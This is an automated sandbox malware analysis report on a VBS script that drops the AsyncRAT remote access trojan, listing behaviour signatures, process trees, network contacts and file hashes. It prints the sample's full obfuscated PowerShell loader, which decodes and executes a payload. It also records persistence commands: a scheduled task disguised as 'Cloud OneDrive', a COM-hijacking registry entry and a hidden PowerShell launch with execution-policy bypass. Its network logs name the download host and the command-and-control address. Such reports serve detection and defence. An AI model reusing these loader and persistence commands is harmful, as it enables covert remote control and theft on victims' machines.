Malware Analysis Report

2024-11-30 19:35

Sample ID 240917-bhcaaayfml
Target 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs
SHA256 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663
Tags
execution asyncrat sasa agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663

Threat Level: Known bad

The file 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat sasa agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Event Triggered Execution: Component Object Model Hijacking

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies registry key

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 01:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 01:08

Reported

2024-09-17 01:10

Platform

win7-20240903-en

Max time kernel

117s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 34.192.83.212:443 www1.coulmandental.com tcp

Files

memory/1616-4-0x000007FEF551E000-0x000007FEF551F000-memory.dmp

memory/1616-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/1616-7-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/1616-8-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-9-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-10-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af5e7f2ef23eecc37b751cf6f87223e4
SHA1 75c67cdc46a28d08b454d5715bee78e173557714
SHA256 f5e57a22d57b2469af08b583a7b210343cd7ebd7c0a83669b97b038b9c7c5710
SHA512 d85435bd3ccf41cfba1be90de0d3a47542b2709100f6d75d53fa30fa2eca597ffa8fe01710eae58dedc41b1d39d96f82eb21be9557c8aaad3344e2753af8c08e

memory/1616-16-0x000007FEF551E000-0x000007FEF551F000-memory.dmp

memory/1616-17-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-18-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 01:08

Reported

2024-09-17 01:10

Platform

win10v2004-20240802-en

Max time kernel

125s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2188 wrote to memory of 2232 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2232 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1900 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 4464 wrote to memory of 3520 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4464 wrote to memory of 3520 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3520 wrote to memory of 3200 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 3200 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2860 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3988,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 8.8.8.8:53 212.83.192.34.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 88.119.175.153:8808 tcp
US 8.8.8.8:53 153.175.119.88.in-addr.arpa udp

Files

memory/2232-0-0x00007FFC74443000-0x00007FFC74445000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfm1myhk.e3j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2232-6-0x00000234AC6D0000-0x00000234AC6F2000-memory.dmp

memory/2232-11-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

memory/2232-12-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

memory/2232-22-0x00007FFC74443000-0x00007FFC74445000-memory.dmp

memory/2232-23-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
